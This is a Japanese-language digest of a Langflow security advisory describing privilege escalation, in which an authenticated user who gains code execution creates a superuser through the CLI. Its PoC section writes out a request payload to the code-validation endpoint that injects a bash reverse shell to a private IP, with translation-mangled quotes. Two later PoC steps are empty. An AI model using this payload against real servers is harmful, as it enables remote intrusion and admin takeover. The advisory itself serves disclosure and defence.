【要点】

◎Langflow では RCE 取得後に CLI 経由で superuser を作成でき、権限を完全に突破できる脆弱性がある。1.5.1 未満が影響し修正は未提供。

【図表】

出典: https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r

【要約】

Langflow のコンテナ環境において、認証済みユーザーが RCE を得た場合、内部CLIコマンド langflow superuser を実行し、新たな管理者アカウントを作成できる特権昇格脆弱性が確認された。これは UI 上で一般ユーザーとして登録した場合でも回避可能で、フロントエンドの権限検証やバックエンドの整合性を完全に迂回する。Check Point が発見し、/api/v1/validate/code を悪用した RCE と組み合わせることで、容易に superuser 権限を奪取できる。現行版 (<1.5.1) にパッチは存在しない。

【公開情報】

◆Privilege Escalation via CLI Superuser Creation (Post-RCE) (langflow-ai, 2025/08/25)
https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r

【PoC】

1. LANGFLOW_ENABLE_AUTHをTrueに設定してコンテナを起動。
2. http://localhost:7860 にアクセスしサインアップ（ユーザーはis_su
peruserフラグが設定されない）。

3. /api/v1/validate/codeを悪用しリバースシェルを取得
認証済みPOSTリクエスト送信:
{

「code」: 「def foo(p=__import__(『os』).system(\」bash -c 『b
ash -i >& /dev/tcp/192.168.1.22/4444 0>&1』\「)):\n pass」
}
4. リバースシェル内でスーパーユーザーを作成:

5. 新規スーパーユーザーとしてUIにログイン: